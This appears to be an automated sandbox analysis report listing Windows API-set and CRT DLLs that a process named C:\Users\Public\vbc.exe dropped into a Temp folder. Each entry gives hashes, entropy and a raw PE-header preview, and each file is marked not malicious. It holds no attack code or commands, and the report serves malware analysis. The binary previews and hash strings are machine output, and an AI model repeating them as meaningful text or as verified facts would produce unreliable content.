                                                                                                  Category:dropped
                                                                                                  Size (bytes):17712
                                                                                                  Entropy (8bit):7.187691342157284
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                                                  MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                                                  SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                                                  SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                                                  SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17720
                                                                                                  Entropy (8bit):7.19694878324007
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                                                  MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                                                  SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                                                  SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                                                  SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-string-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.137724132900032
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                                                  MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                                                  SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                                                  SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                                                  SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-synch-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.04640581473745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-synch-l1-2-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.138910839042951
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.072555805949365
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18224
                                                                                                  Entropy (8bit):7.17450177544266
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                  MD5:BABF80608FD68A09656871EC8597296C
                                                                                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-util-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1007227686954275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                                                  MD5:0F079489ABD2B16751CEB7447512A70D
                                                                                                  SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                                                  SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                                                  SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.088693688879585
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                                                  MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                                                  SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                                                  SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                                                  SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22328
                                                                                                  Entropy (8bit):6.929204936143068
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                                                  MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                                                  SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                                                  SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                                                  SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18736
                                                                                                  Entropy (8bit):7.078409479204304
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                                                  MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                                                  SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                                                  SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                                                  SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.085387497246545
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                                                  MD5:AEC2268601470050E62CB8066DD41A59
                                                                                                  SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                                                  SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                                                  SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.060393359865728
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                                                  MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                                                  SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                                                  SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                                                  SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.13172731865352
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                                                  MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                                                  SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                                                  SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                                                  SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-math-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28984
                                                                                                  Entropy (8bit):6.6686462438397
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                                                  MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                                                  SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                                                  SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                                                  SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26424
                                                                                                  Entropy (8bit):6.712286643697659
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                                                  MD5:35FC66BD813D0F126883E695664E7B83
                                                                                                  SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                                                  SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                                                  SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-private-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):73016
                                                                                                  Entropy (8bit):5.838702055399663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                                                  MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                                                  SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                                                  SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                                                  SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-process-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.076072254895036
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                                                  MD5:8D02DD4C29BD490E672D271700511371
                                                                                                  SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                                                  SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                                                  SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                                                  Malicious:false
